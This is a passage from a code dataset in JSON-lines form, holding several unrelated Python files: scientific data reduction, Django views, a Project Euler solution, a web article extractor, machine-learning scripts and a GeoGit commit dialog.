self.getProperty('BinReductionFactor').value\n\n self._parameter_table = self.getPropertyValue('ParameterWorkspace')\n if self._parameter_table == '':\n self._parameter_table = getWSprefix(self._sample) + 'TransformToIqtParameters'\n\n self._output_workspace = self.getPropertyValue('OutputWorkspace')\n if self._output_workspace == '':\n self._output_workspace = getWSprefix(self._sample) + 'iqt'\n\n self._dry_run = self.getProperty('DryRun').value\n\n\n def validateInputs(self):\n \"\"\"\n Validate input properties.\n \"\"\"\n issues = dict()\n\n e_min = self.getProperty('EnergyMin').value\n e_max = self.getProperty('EnergyMax').value\n\n # Check for swapped energy values\n if e_min > e_max:\n energy_swapped = 'EnergyMin is greater than EnergyMax'\n issues['EnergyMin'] = energy_swapped\n issues['EnergyMax'] = energy_swapped\n\n return issues\n\n\n def _calculate_parameters(self):\n \"\"\"\n Calculates the TransformToIqt parameters and saves in a table workspace.\n \"\"\"\n workflow_prog = Progress(self, start=0.0, end=0.3, nreports=8)\n workflow_prog.report('Croping Workspace')\n CropWorkspace(InputWorkspace=self._sample,\n OutputWorkspace='__TransformToIqt_sample_cropped',\n Xmin=self._e_min,\n Xmax=self._e_max)\n workflow_prog.report('Calculating table properties')\n x_data = mtd['__TransformToIqt_sample_cropped'].readX(0)\n number_input_points = len(x_data) - 1\n num_bins = int(number_input_points / self._number_points_per_bin)\n self._e_width = (abs(self._e_min) + abs(self._e_max)) / num_bins\n\n workflow_prog.report('Attemping to Access IPF')\n try:\n workflow_prog.report('Access IPF')\n instrument = mtd[self._sample].getInstrument()\n\n analyserName = instrument.getStringParameter('analyser')[0]\n analyser = instrument.getComponentByName(analyserName)\n\n if analyser is not None:\n logger.debug('Found %s component in instrument %s, will look for resolution there'\n % (analyserName, instrument))\n resolution = analyser.getNumberParameter('resolution')[0]\n else:\n logger.debug('No %s component found on instrument %s, will look for resolution in top level instrument'\n % (analyserName, instrument))\n resolution = instrument.getNumberParameter('resolution')[0]\n\n logger.information('Got resolution from IPF: %f' % resolution)\n workflow_prog.report('IPF resolution obtained')\n except (AttributeError, IndexError):\n workflow_prog.report('Resorting to Default')\n resolution = 0.0175\n logger.warning('Could not get resolution from IPF, using default value: %f' % (resolution))\n\n resolution_bins = int(round((2 * resolution) / self._e_width))\n\n if resolution_bins < 5:\n logger.warning('Resolution curve has <5 points. Results may be unreliable.')\n\n workflow_prog.report('Creating Parameter table')\n param_table = CreateEmptyTableWorkspace(OutputWorkspace=self._parameter_table)\n\n workflow_prog.report('Populating Parameter table')\n param_table.addColumn('int', 'SampleInputBins')\n param_table.addColumn('float', 'BinReductionFactor')\n param_table.addColumn('int', 'SampleOutputBins')\n param_table.addColumn('float', 'EnergyMin')\n param_table.addColumn('float', 'EnergyMax')\n param_table.addColumn('float', 'EnergyWidth')\n param_table.addColumn('float', 'Resolution')\n param_table.addColumn('int', 'ResolutionBins')\n\n param_table.addRow([number_input_points, self._number_points_per_bin, num_bins,\n self._e_min, self._e_max, self._e_width,\n resolution, resolution_bins])\n\n workflow_prog.report('Deleting temp Workspace')\n DeleteWorkspace('__TransformToIqt_sample_cropped')\n\n self.setProperty('ParameterWorkspace', param_table)\n\n\n def _add_logs(self):\n sample_logs = [('iqt_sample_workspace', self._sample),\n ('iqt_resolution_workspace', self._resolution),\n ('iqt_binning', '%f,%f,%f' % (self._e_min, self._e_width, self._e_max))]\n\n log_alg = self.createChildAlgorithm(name='AddSampleLogMultiple', startProgress=0.8,\n endProgress=1.0, enableLogging=True)\n log_alg.setProperty('Workspace', self._output_workspace)\n log_alg.setProperty('LogNames',[item[0] for item in sample_logs])\n log_alg.setProperty('LogValues', [item[1] for item in sample_logs])\n log_alg.execute()\n\n\n def _transform(self):\n \"\"\"\n Run TransformToIqt.\n \"\"\"\n from IndirectCommon import CheckHistZero, CheckHistSame, CheckAnalysers\n trans_prog = Progress(self, start=0.3, end=0.8, nreports=15)\n try:\n CheckAnalysers(self._sample, self._resolution)\n except ValueError:\n # A genuine error the shows that the two runs are incompatible\n raise\n except:\n # Checking could not be performed due to incomplete or no instrument\n logger.warning('Could not check for matching analyser and reflection')\n\n # Process resolution data\n num_res_hist = CheckHistZero(self._resolution)[0]\n if num_res_hist > 1:\n CheckHistSame(self._sample, 'Sample', self._resolution, 'Resolution')\n\n rebin_param = str(self._e_min) + ',' + str(self._e_width) + ',' + str(self._e_max)\n trans_prog.report('Rebinning Workspace')\n Rebin(InputWorkspace=self._sample,\n OutputWorkspace='__sam_data',\n Params=rebin_param,\n FullBinsOnly=True)\n\n # Sample\n trans_prog.report('Rebinning sample')\n Rebin(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_data',\n Params=rebin_param)\n trans_prog.report('Integrating Sample')\n Integration(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_int')\n trans_prog.report('Converting Sample to data points')\n ConvertToPointData(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_data')\n trans_prog.report('Extracting FFT spectrum for Sample')\n ExtractFFTSpectrum(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_fft',\n FFTPart=2)\n trans_prog.report('Dividing Sample')\n Divide(LHSWorkspace='__sam_fft',\n RHSWorkspace='__sam_int',\n OutputWorkspace='__sam')\n\n # Resolution\n trans_prog.report('Rebinnig Resolution')\n Rebin(InputWorkspace=self._resolution,\n OutputWorkspace='__res_data',\n Params=rebin_param)\n trans_prog.report('Integrating Resolution')\n Integration(InputWorkspace='__res_data',\n OutputWorkspace='__res_int')\n trans_prog.report('Converting Resolution to data points')\n ConvertToPointData(InputWorkspace='__res_data',\n OutputWorkspace='__res_data')\n trans_prog.report('Extractig FFT Resolution spectrum')\n ExtractFFTSpectrum(InputWorkspace='__res_data',\n OutputWorkspace='__res_fft',\n FFTPart=2)\n trans_prog.report('Dividing Resolution')\n Divide(LHSWorkspace='__res_fft',\n RHSWorkspace='__res_int',\n OutputWorkspace='__res')\n\n trans_prog.report('Diving Workspaces')\n Divide(LHSWorkspace='__sam',\n RHSWorkspace='__res',\n OutputWorkspace=self._output_workspace)\n\n # Cleanup sample workspaces\n trans_prog.report('Deleting Sample temp')\n DeleteWorkspace('__sam_data')\n DeleteWorkspace('__sam_int')\n DeleteWorkspace('__sam_fft')\n DeleteWorkspace('__sam')\n\n # Crop nonsense values off workspace\n binning = int(math.ceil(mtd[self._output_workspace].blocksize() / 2.0))\n bin_v = mtd[self._output_workspace].dataX(0)[binning]\n trans_prog.report('Cropping output')\n CropWorkspace(InputWorkspace=self._output_workspace,\n OutputWorkspace=self._output_workspace,\n XMax=bin_v)\n\n # Set Y axis unit and label\n mtd[self._output_workspace].setYUnit('')\n mtd[self._output_workspace].setYUnitLabel('Intensity')\n\n trans_prog.report('Deleting Resolution temp')\n # Clean up resolution workspaces\n DeleteWorkspace('__res_data')\n DeleteWorkspace('__res_int')\n DeleteWorkspace('__res_fft')\n DeleteWorkspace('__res')\n\n\n# Register algorithm with Mantid\nAlgorithmFactory.subscribe(TransformToIqt)\n","sub_path":"Framework/PythonInterface/plugins/algorithms/WorkflowAlgorithms/TransformToIqt.py","file_name":"TransformToIqt.py","file_ext":"py","file_size_in_byte":12848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"222716760","text":"from django.http import JsonResponse\nfrom ...base.processa import ListaArquivos\nimport os\nfrom django.conf import settings\n\nlista_arquivos = ListaArquivos\n\ndef lista_arvore(request):\n caminho = request.GET.get('caminho', None)\n if(caminho == '/'):\n caminho = settings.MEDIA_URL\n meuDir = caminho\n diretorio, arquivos,detalheArquivosModificado,\\\n detalheArquivosCriados,detalhePastaModificadas,\\\n detalhePastaCriadas = lista_arquivos.list_files(meuDir)\n\n #Remove / duplicado em caminhos de diretorios\n teste = list(caminho[::-1].split()[0])\n anterior = list(caminho[::-1].split()[0])\n char = teste[0]\n if(teste[0] == '/'):\n teste.pop(0)\n char = teste[0]\n cont = 0\n while(char != '/'):\n teste.pop(0)\n char = teste[0]\n if(teste[0] == '/'):\n teste.pop(0)\n\n teste = teste[::-1]\n teste = ''.join(teste)\n\n data = {\n 'anterior': teste,\n 'arquivos' : arquivos,\n 'diretorios' : diretorio,\n 'caminho' : meuDir,\n 'detalheArquivosModificado' : detalheArquivosModificado,\n 'detalheArquivosCriados' : detalheArquivosCriados,\n 'detalhePastaModificadas' : detalhePastaModificadas,\n 'detalhePastaCriadas' : detalhePastaCriadas\n }\n return data\n","sub_path":"estagio/estagio/base/lista_arvore/lista_arvore.py","file_name":"lista_arvore.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"602210016","text":"def as_factorization(number):\n if number == 1:\n return {}\n for p in [2, 3, 5, 7]:\n if 0 == number % p:\n ret = as_factorization(number // p)\n ret[p] = ret.get(p, 0) + 1\n return ret\n return {number: 1}\n\n\ndef as_number(factorization):\n ret = 1\n for p, exp in factorization.items():\n ret *= p ** exp\n return ret\n\n\ndef is_square_free(factorization):\n return max(factorization.values(), default=0) <= 1\n\n\nbinomial_coefficient_cache = {}\n\n\ndef binomial_coefficient(n, k):\n if k == 0 or k == n:\n return {}\n if (n, k) in binomial_coefficient_cache:\n return binomial_coefficient_cache[(n, k)]\n ret = binomial_coefficient(n - 1, k - 1).copy()\n for p, exp in as_factorization(n).items():\n ret[p] = ret.get(p, 0) + exp\n for p, exp in as_factorization(k).items():\n ret[p] -= exp\n binomial_coefficient_cache[(n, k)] = ret\n return ret\n\n\ngood_numbers = set()\nfor n in range(51):\n for k in range(n + 1):\n binomial = binomial_coefficient(n, k)\n if is_square_free(binomial):\n good_numbers.add(as_number(binomial))\nans = sum(good_numbers)\n\nassert 34029210557338 == ans\n","sub_path":"p203.py","file_name":"p203.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"631781457","text":"# -*- coding: utf-8 -*-\nimport os\nfrom goose.Configuration import Configuration\nfrom goose.Crawler import CrawlCandidate\nfrom goose.Crawler import Crawler\nfrom goose.Article import Article\n\nclass Goose(object):\n \"\"\"\\\n \n \"\"\"\n def __init__(self, config=None):\n self.config = config or Configuration()\n self.initializeEnvironment()\n \n \n def extractContent(self, url=None, rawHTML=None):\n \"\"\"\\\n Main method to extract an article object from a URL, \n pass in a url and get back a Article\n \"\"\"\n cc = CrawlCandidate(self.config, url, rawHTML)\n return self.sendToActor(cc)\n \n \n def shutdownNetwork(self):\n pass\n \n \n def sendToActor(self, crawlCandiate):\n crawler = Crawler(self.config)\n article = crawler.crawl(crawlCandiate)\n return article\n \n \n def initializeEnvironment(self):\n # test if config.localStoragePath\n # is a directory\n if not os.path.isdir(self.config.localStoragePath):\n os.makedirs(self.config.localStoragePath)\n \n if not os.path.isdir(self.config.localStoragePath):\n raise Exception(self.config.localStoragePath + \n \" directory does not seem to exist, \"\n \"you need to set this for image processing downloads\"\n )\n \n # test to write a dummy file to the directory\n # to check is directory is writtable\n path = '%s/test.txt' % self.config.localStoragePath\n try:\n f = open(path, 'w')\n f.close()\n os.remove(path)\n except IOError:\n raise Exception(self.config.localStoragePath + \n \" directory is not writeble, \"\n \"you need to set this for image processing downloads\"\n )\n \n \n \n ","sub_path":"goose/Goose.py","file_name":"Goose.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"170137766","text":"import sys, os, pathlib, json\nfrom os import listdir\nfrom os.path import isfile, join\n\ndicts = {}\n\ndef path_to_paper_id(path):\n return path.split(\"/\")[-1][:-5] #cutting last 5 cuts \".json\"\n\ndef read_article(path):\n with open(path) as f:\n d = json.load(f)\n title_data = [d[\"metadata\"][\"title\"]]\n abstract_data = [a[\"text\"] for a in d[\"abstract\"]]\n body_text_data = [t[\"text\"] for t in d[\"body_text\"]] #a list of all text sections in article\n\n\n return [title_data, abstract_data, body_text_data] #\n\ndef read_meta(paperid):\n metafile = open(\"meta_subset_100.csv\", \"r\")\n for line in metafile:\n if paperid in line:\n metaline = line.split(\",\")\n coord_uid = metaline[0]\n sourcedb = metaline[2]\n sourceid = metaline[5]\n return [coord_uid, sourcedb, sourceid]\n\ndef setup_dicts():\n covid19_list = [line for line in open (\"Supplemental_file2.txt\")]\n sars_list = [line for line in open(\"Supplemental_file1.txt\")]\n\n dicts[\"covid19\"] = covid19_list\n dicts[\"sars\"] = sars_list\n \n\ndef tag_article(article_path):\n article = read_article(article_path)\n section_nr = 0\n denotated_sections = []\n\n for section in article:\n denotations = []\n for subsection in section:\n for id in dicts.keys():\n for phrase in dicts[id]:\n begin = subsection.find(\"virus\")\n if begin > 0:#found phrase\n end = begin + len(phrase)\n info = {\"id\": id, \"span\":{\"begin\":begin, \"end\":end}, \"obj\":\"?\"}\n denotations.append(info)\n denotated_sections.append(denotations)\n return denotated_sections\n\ndef generate_JSONs(denotated_sections):\n for filenr in range(20):\n with open(\"result.json\" + str(filenr), \"w\") as fp:\n json.dump(denotated_sections[filenr], fp)\n\n\n\n\ndef main():\n subset_path = os.path.abspath(\"comm_use_subset_100\") + \"/\"\n comm_use_subset_100 = [f for f in listdir(subset_path) if isfile(join(subset_path, f))]\n fileonepath = subset_path + comm_use_subset_100[0]\n setup_dicts()\n\n denot_sections = tag_article(fileonepath)\n generate_JSONs(denot_sections)\n \nif __name__ == '__main__':\n main()\n \n\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"569008219","text":"import matplotlib.image as mpimg\nimport numpy as np\nimport glob\nimport time\nimport pickle\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom helper import single_img_features\n\ncars = glob.glob('data/vehicles/*/*.png')\nnotcars = glob.glob('data/non-vehicles/*/*.png')\n\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 16 # HOG orientations\npix_per_cell = 16 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = 'ALL' # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (32, 32) # Spatial binning dimensions\nhist_bins = 32 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\n\n\ndef extract_features(imgs):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file in imgs:\n # Read in each one by one\n image = mpimg.imread(file)\n img_features = single_img_features(image,\n color_space=color_space,\n spatial_size=spatial_size,\n hist_bins=hist_bins,\n orient=orient,\n pix_per_cell=pix_per_cell,\n cell_per_block=cell_per_block,\n hog_channel=hog_channel,\n spatial_feat=spatial_feat,\n hist_feat=hist_feat,\n hog_feat=hog_feat)\n features.append(img_features)\n return features\n\n\nt = time.time()\ncar_features = extract_features(cars)\nnotcar_features = extract_features(notcars)\nt2 = time.time()\nprint(round(t2 - t, 2), 'Seconds to extract HOG features...')\nX = np.vstack((car_features, notcar_features)).astype(np.float64)\nX_scaler = StandardScaler().fit(X)\nscaled_X = X_scaler.transform(X)\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.1, random_state=1)\n\nprint('Using:', orient, 'orientations', pix_per_cell,\n 'pixels per cell and', cell_per_block, 'cells per block')\nprint('Feature vector length:', len(X_train[0]))\nsvc = LinearSVC()\nt = time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2 - t, 2), 'Seconds to train SVC...')\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\nt = time.time()\nn_predict = 10\nprint('My SVC predicts: ', svc.predict(X_test[0:n_predict]))\nprint('For these', n_predict, 'labels: ', y_test[0:n_predict])\nt2 = time.time()\nprint(round(t2 - t, 5), 'Seconds to predict', n_predict, 'labels with SVC')\nCM = confusion_matrix(y_test, svc.predict(X_test))\nprint('False positive {:.2%}'.format(CM[0][1] / len(y_test)))\nprint('False negative {:.2%}'.format(CM[1][0] / len(y_test)))\n\nwith open('svm.pkl', 'wb') as fid:\n pickle.dump(color_space, fid)\n pickle.dump(orient, fid)\n pickle.dump(pix_per_cell, fid)\n pickle.dump(cell_per_block, fid)\n pickle.dump(hog_channel, fid)\n pickle.dump(spatial_size, fid)\n pickle.dump(hist_bins, fid)\n pickle.dump(spatial_feat, fid)\n pickle.dump(hist_feat, fid)\n pickle.dump(hog_feat, fid)\n pickle.dump(svc, fid)\n pickle.dump(X_scaler, fid)\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"564210647","text":"import pandas as pd\nimport os.path\nimport numpy as np\nimport datetime\n\nDATE = \"Date\"\nACTUALCASE = \"ActualCases\"\nPREDICTS = \"Predicts\"\nDATE_FORMAT = \"%Y-%m-%d\"\nCASES_COLUMN = \"cases\"\nDATE_COLUMN = \"date\"\n\n\nclass baseModel:\n def __init__(self):\n pass\n\n def save_result(self,\n file_name: str,\n dates: pd.DataFrame,\n actual_data: pd.DataFrame,\n col_name: str,\n forecast_data: pd.DataFrame):\n \"\"\"\n Save prediction along with actual result\n :param file_name: file to save result to\n :param dates: dataframe containing dates\n :param actual_data: actual covid data\n :param col_name: column containing actual cases\n :param forecast_data: prediction data\n :return:\n \"\"\"\n df = pd.DataFrame({\n DATE: dates.tolist(),\n ACTUALCASE: actual_data[col_name].values.tolist(),\n PREDICTS:list(map(int, forecast_data.tolist()))},\n columns=[DATE, ACTUALCASE, PREDICTS])\n\n write_header = False if os.path.exists(file_name) else True\n with open(file_name, \"a+\") as f:\n df.to_csv(f, header=write_header, index=False)\n\n def get_actual_dates(self, dates: pd.DataFrame, start_day: int, end_day: int) -> np.array:\n \"\"\"\n Retrieve dates column\n :param dates: dataframe containing dates\n :param start_day: start day for prediction\n :param end_day: end day of prediction\n :return: dates array\n \"\"\"\n\n start_date = datetime.datetime.strptime(dates.iloc[0], DATE_FORMAT)\n\n dates_array = np.array([(start_date+datetime.timedelta(days=i)).strftime(DATE_FORMAT)\n for i in range(start_day, end_day)])\n\n return dates_array\n\n def get_actual_cases(self, cases: pd.DataFrame, start: int, end: int) -> pd.DataFrame:\n \"\"\"\n :param cases: dataframe containing all actual cases\n :param start: start index of actual cases\n :param end: end index of actual cases\n :return: dataframe containing actual cases\n \"\"\"\n if start >= len(cases):\n return pd.DataFrame(np.nan, index=[n for n in range(end-start)], columns=['cases'])\n\n if end < len(cases):\n return cases.iloc[start:end]\n\n return pd.DataFrame(cases[start:].astype(np.int).values.tolist()\n + [np.NaN for i in range(end-len(cases))], columns=[CASES_COLUMN])\n","sub_path":"model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"593521226","text":"#########################################################\n#\n# SimulationJobOptions/postInclude.Save7GeVpTPileUpTruthJets.py\n# John Chapman\n#\n# Reconfigure MergeTruthJetsTool to save Truth Jets with pT > 7 GeV\n# both in-time and out-of-time.\n#\n# This job option should be added via the postInclude\n# command line argument.\n#\n#########################################################\nfrom AthenaCommon.SystemOfUnits import GeV\nfrom AthenaCommon.AlgSequence import AlgSequence\ntopSequence = AlgSequence()\n\nfor alg in topSequence:\n if 'PileUpToolsAlg' in alg.name():\n alg.PileUpTools[\"MergeTruthJetsTool\"].InTimePtCut = 7.0 * GeV\n alg.PileUpTools[\"MergeTruthJetsTool\"].OutOfTimePtCut = 7.0 * GeV\n break\n if 'MergeTruthJets' == alg.name():\n alg.MergeTruthJetsTool.InTimePtCut = 7.0 * GeV\n alg.MergeTruthJetsTool.OutOfTimePtCut = 7.0 * GeV\n break\n","sub_path":"Simulation/SimulationJobOptions/share/pileup/postInclude.Save7GeVpTPileUpTruthJets.py","file_name":"postInclude.Save7GeVpTPileUpTruthJets.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"5019938","text":"import gym\nimport numpy as np\nimport time\nimport os\n\nfrom openlockagents.OpenLockLearner.util.common import (\n FIXED_STRUCTURE_ATTRIBUTES_GRAPH_SIMPLIFIED_TESTING_PATH,\n CAUSAL_CHAIN_EDGES,\n)\nfrom openlockagents.OpenLockLearner.learner.OpenLockLearnerAgent import (\n OpenLockLearnerAgent,\n)\nfrom openlockagents.OpenLockLearner.main.simplified_testing_scenario import (\n generate_perceptually_causal_relations_simplified_testing_scenario\n)\nimport openlockagents.OpenLockLearner.util.plotter as plotter\nfrom openlockagents.OpenLockLearner.util.setup_util import setup_causal_chain_space, create_and_run_agent\nfrom openlockagents.OpenLockLearner.experiments.IG_vs_random_intervention_common import run_experiment\nfrom openlock.settings_trial import PARAMS\n\n\ndef main():\n fake_model_data = [\n plotter.MultiRunPlotData(\"Fake 1\", np.random.rand(5, 1000)),\n plotter.MultiRunPlotData(\"Fake 2\", np.random.rand(5, 1000)),\n ]\n # plotter.create_plot_from_multi_run_plot_data(fake_model_data, \"Fake x-axis\", \"Fake y-axis\", \"Fake test plot\", data_dir=os.path.expanduser(\"~/Desktop\"))\n\n # compares if random intervention selection is better than intervention selection based on information gain\n\n global_start_time = time.time()\n\n params = PARAMS[\"CE3-CE4\"]\n params[\"data_dir\"] = \"~/Desktop/OpenLockLearningResultsTesting/subjects\"\n params[\"train_scenario_name\"] = \"CE3_simplified\"\n params[\"test_scenario_name\"] = \"CE3_simplified\"\n params[\"train_attempt_limit\"] = 10000\n params[\"test_attempt_limit\"] = 10000\n # params['full_attempt_limit'] = True # run to the full attempt limit, regardless of whether or not all solutions were found\n # run to the full attempt limit, regardless of whether or not all solutions were found\n params[\"full_attempt_limit\"] = False\n params[\"intervention_sample_size\"] = 10\n params[\"chain_sample_size\"] = 1000\n\n params[\"using_ids\"] = True\n params[\"multiproc\"] = True\n\n params['prune_chain_space'] = False\n params['generate_chains'] = False\n\n params[\"chain_data_dir\"] =FIXED_STRUCTURE_ATTRIBUTES_GRAPH_SIMPLIFIED_TESTING_PATH\n params[\"chain_mode\"] = \"full\"\n\n np.random.seed(1234)\n\n structure = CAUSAL_CHAIN_EDGES\n\n perceptually_causal_relations = generate_perceptually_causal_relations_simplified_testing_scenario()\n\n num_runs = 3\n\n run_experiment(\n params=params,\n structure=structure,\n perceptually_causal_relations=perceptually_causal_relations,\n num_runs=num_runs,\n )\n\n print(\"Finished. Total runtime: {}s\".format(time.time() - global_start_time))\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"openlockagents/OpenLockLearner/experiments/IG_vs_random_intervention_simplified_testing_scenario.py","file_name":"IG_vs_random_intervention_simplified_testing_scenario.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"177145397","text":"from PyQt4 import QtGui, QtCore\nfrom opengeo import geogit\nfrom twowaydiff import TwoWayDiffViewerDialog\n\nclass CommitDialog(QtGui.QDialog):\n \n def __init__(self, repo, parent = None):\n super(CommitDialog, self).__init__(parent)\n self.repo = repo\n self.paths = None\n self.diffs = repo.notindatabase()\n self.initGui()\n \n def initGui(self): \n self.resize(600, 400) \n self.setWindowTitle('GeoGit')\n\n self.verticalLayout = QtGui.QVBoxLayout()\n self.verticalLayout.setSpacing(2)\n self.verticalLayout.setMargin(5)\n \n self.msgLabel = QtGui.QLabel(\"Commit message\")\n self.verticalLayout.addWidget(self.msgLabel)\n \n self.splitter = QtGui.QSplitter(self) \n self.splitter.setOrientation(QtCore.Qt.Vertical)\n self.text = QtGui.QPlainTextEdit(self.splitter)\n self.text.textChanged.connect(self.textHasChanged)\n \n self.verticalLayout2 = QtGui.QVBoxLayout(self.splitter)\n self.verticalLayout2.setSpacing(2)\n self.verticalLayout2.setMargin(5)\n \n self.table = QtGui.QTableWidget()\n self.table.setColumnCount(2) \n self.table.setShowGrid(False)\n self.table.verticalHeader().hide()\n self.table.setHorizontalHeaderLabels([\"Path\", \"Status\"])\n self.table.horizontalHeader().setMinimumSectionSize(150) \n self.table.setSelectionMode(QtGui.QAbstractItemView.NoSelection)\n self.table.setRowCount(len(self.diffs)) \n for i, diff in enumerate(self.diffs):\n widget = QtGui.QTableWidgetItem(diff.path)\n widget.setFlags(QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n widget.setCheckState(QtCore.Qt.Checked) \n self.table.setItem(i, 0, widget);\n self.table.setItem(i, 1, QtGui. QTableWidgetItem(diff.type())); \n self.table.horizontalHeader().setStretchLastSection(True) \n self.table.resizeRowsToContents() \n self.linksLabel = QtGui.QLabel(' All       None')\n self.connect(self.linksLabel, QtCore.SIGNAL(\"linkActivated(QString)\"), self.linkClicked) \n self.verticalLayout2.addWidget(self.linksLabel)\n self.verticalLayout2.addWidget(self.table)\n \n self.verticalLayout.addWidget(self.splitter) \n self.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Close)\n self.verticalLayout.addWidget(self.buttonBox)\n self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(False)\n self.setLayout(self.verticalLayout)\n \n self.table.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.table.customContextMenuRequested.connect(self.showTablePopupMenu)\n \n self.connect(self.buttonBox, QtCore.SIGNAL(\"accepted()\"), self.okPressed)\n self.connect(self.buttonBox, QtCore.SIGNAL(\"rejected()\"), self.cancelPressed)\n \n def linkClicked(self, s):\n if s == \"all\":\n self.selectAll()\n else:\n self.selectNone()\n \n def selectNone(self):\n for i, diff in enumerate(self.diffs): \n self.table.item(i, 0).setCheckState(QtCore.Qt.Unchecked);\n \n def selectAll(self):\n for i, diff in enumerate(self.diffs): \n self.table.item(i, 0).setCheckState(QtCore.Qt.Checked); \n \n def showTablePopupMenu(self,point):\n currentItem = self.table.itemAt(point)\n self.currentPath = unicode(currentItem.data(0)) \n popupmenu = QtGui.QMenu() \n viewChangesAction = QtGui.QAction(\"View changes...\", self.table)\n viewChangesAction .triggered.connect(self.viewChanges)\n popupmenu.addAction(viewChangesAction)\n popupmenu.exec_(self.table.mapToGlobal(point)) \n \n def viewChanges(self): \n dlg = TwoWayDiffViewerDialog(self.repo.getfeaturediffs(geogit.HEAD, geogit.WORK_HEAD, self.currentPath))\n dlg.exec_() \n \n def textHasChanged(self):\n self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(str(self.text.toPlainText()) != \"\")\n \n def getPaths(self):\n return self.paths\n \n def getMessage(self):\n return str(self.text.toPlainText())\n\n def okPressed(self):\n self.paths = []\n for i in range(len(self.diffs)):\n widget = self.table.item(i, 0)\n state = widget.checkState()\n if state == QtCore.Qt.Checked:\n self.paths.append(self.diffs[i].path) \n if not self.paths:\n QtGui.QMessageBox.information(self, \"Cannot commit\",\n \"No elements has been selected.\\n Empty commits are not allowed.\")\n else:\n self.close()\n\n def cancelPressed(self):\n self.paths = None\n self.close() \n","sub_path":"src/opengeo/gui/dialogs/commitdialog.py","file_name":"commitdialog.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"642427369","text":"from datatableview import helpers\nfrom datatableview import Datatable\nfrom datatableview.views import XEditableDatatableView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse\nfrom django.views.generic import DetailView, ListView, RedirectView, UpdateView\n\nfrom .models import BatchException, User\n\n\nclass UserDetailView(LoginRequiredMixin, DetailView):\n model = User\n # These next two lines tell the view to index lookups by username\n slug_field = 'username'\n slug_url_kwarg = 'username'\n\n\nclass UserRedirectView(LoginRequiredMixin, RedirectView):\n permanent = False\n\n def get_redirect_url(self):\n return reverse('users:detail',\n kwargs={'username': self.request.user.username})\n\n\nclass UserUpdateView(LoginRequiredMixin, UpdateView):\n\n fields = ['name', ]\n\n # we already imported User in the view code above, remember?\n model = User\n\n # send the user back to their own page after a successful update\n def get_success_url(self):\n return reverse('users:detail',\n kwargs={'username': self.request.user.username})\n\n def get_object(self):\n # Only get the User record for the user making the request\n return User.objects.get(username=self.request.user.username)\n\nclass UserListView(LoginRequiredMixin, ListView):\n model = User\n # These next two lines tell the view to index lookups by username\n slug_field = 'username'\n slug_url_kwarg = 'username'\n\nclass XEditableColumnsDatatableView(XEditableDatatableView):\n template_name = \"batchexception_list.html\"\n model = BatchException\n class datatable_class(Datatable):\n class Meta:\n columns = ['batchExceptionID', 'batchID', 'createdBy', 'createdOn', 'modifiedBy', 'modifiedOn', 'fileName', 'exceptionReason']\n processors = {\n 'batchExceptionID': helpers.make_xeditable,\n 'batchID': helpers.make_xeditable,\n 'createdBy': helpers.make_xeditable,\n 'createdOn': helpers.make_xeditable,\n 'modifiedBy': helpers.make_xeditable,\n 'modifiedOn': helpers.make_xeditable,\n 'fileName': helpers.make_xeditable,\n 'exceptionReason': helpers.make_xeditable,\n }\n\n\n\"\"\"\nclass BatchExceptionDatatableView(XEditableDatatableView):\n model = BatchException\n #template_name = 'users/x_editable_columns.html'\n datatable_options = {\n \t'columns': [\n ('ID', 'batchExcpetionID', helpers.make_xeditable),\n ('Batch Id', 'batchID', helpers.make_xeditable),\n ('Created By', 'createdBy', helpers.make_xeditable),\n ('Created Date', 'createdOn', helpers.make_xeditable),\n ('Modified By', 'modifiedBy', 